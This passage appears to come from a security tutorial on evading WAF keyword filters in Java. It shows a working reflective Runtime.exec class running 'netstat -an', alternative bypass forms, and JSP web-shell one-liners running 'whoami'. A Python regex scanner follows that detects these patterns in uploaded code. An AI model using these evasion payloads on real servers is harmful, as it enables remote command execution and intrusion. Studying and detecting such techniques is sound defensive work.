In some cases, reflection can be used to invoke sensitive methods without the keywords that a filter looks for, for example to get past some WAF restrictions:
    package org.javaweb.url;

    import java.io.BufferedReader;
    import java.io.InputStreamReader;

    public class z7y {
        public static void main(String[] args) throws Exception {
            // Runtime is obtained through Class.forName/getMethod/invoke,
            // so the literal "Runtime.getRuntime" never appears in the source.
            BufferedReader br = new BufferedReader(new InputStreamReader(
                    ((Runtime) Class.forName("java.lang.Runtime")
                            .getMethod("getRuntime", new java.lang.Class[]{})
                            .invoke(null, new Object[]{}))
                            .exec("netstat -an").getInputStream()));
            String str = "";
            while ((str = br.readLine()) != null) {
                System.out.println(str);
            }
        }
    }
Java imports the java.lang package by default, so you can use the Runtime object directly, but the java.lang.reflect package needs to be imported. If you do not want to import the package, you can call it indirectly, as above. If Class.forName is intercepted, you can change it to:
    String.class.getClass().forName("java.lang.Runtime")...

Of course, you can also use Runtime.class in place of Class.forName("java.lang.Runtime").... If it is blocked, use URLClassLoader to try to bypass it.

    <% out.println(new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec("whoami").getInputStream())).readLine()); %>

If you only want to run the command and do not want to view the result:

    <% Runtime.getRuntime().exec("whoami"); %>
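For reviewing uploaded JSP or Java source, the forms above show why a filter on the literal `Runtime.getRuntime` is not enough: the check has to cover the reflective primitives as well. The following is an added example, not code from the original page; the rule names and the sample inputs are constructed for illustration.

```python
import re

# Rule names are illustrative; the patterns are the forms shown on this page.
RULES = {
    "direct_runtime_exec": r"Runtime\.getRuntime\(\)\.exec\(",
    "forname_runtime": r"forName\(\"java\.lang\.Runtime\"\)",
    "runtime_class_literal": r"Runtime\.class(?!\w)",
    "getmethod_getruntime": r"getMethod\(\"getRuntime\"",
    "reflective_invoke": r"\.invoke\(",  # noisy alone, useful next to the others
    "urlclassloader": r"URLClassLoader",
}
COMPILED = {name: re.compile(rx) for name, rx in RULES.items()}


def normalize(source: str) -> str:
    """Drop all whitespace so 'Class . forName (' matches like 'Class.forName('."""
    return re.sub(r"\s+", "", source)


def naive_keyword_filter(source: str) -> bool:
    """The literal keyword check that the reflective forms do not trigger."""
    return "Runtime.getRuntime" in source


def scan(source: str) -> list[str]:
    """Return the sorted names of every rule that matches the source."""
    text = normalize(source)
    return sorted(name for name, rx in COMPILED.items() if rx.search(text))


# Constructed sample inputs (not real captured files).
SAMPLES = {
    "reflective.java": 'Class . forName("java.lang.Runtime")\n'
                       '  .getMethod("getRuntime", new Class[]{})\n'
                       '  .invoke(null, new Object[]{});',
    "class_literal.jsp": '<% Runtime.class.getMethod("getRuntime").invoke(null); %>',
    "direct.jsp": '<% Runtime.getRuntime().exec("whoami"); %>',
    "benign.java": 'Class.forName("com.mysql.jdbc.Driver");',
}

if __name__ == "__main__":
    for name, src in SAMPLES.items():
        print(f"{name:18} keyword={naive_keyword_filter(src)!s:5} rules={scan(src)}")
```

Static matching of this kind is a triage aid for code review and upload scanning; restricting what the application server process is allowed to execute remains the actual control.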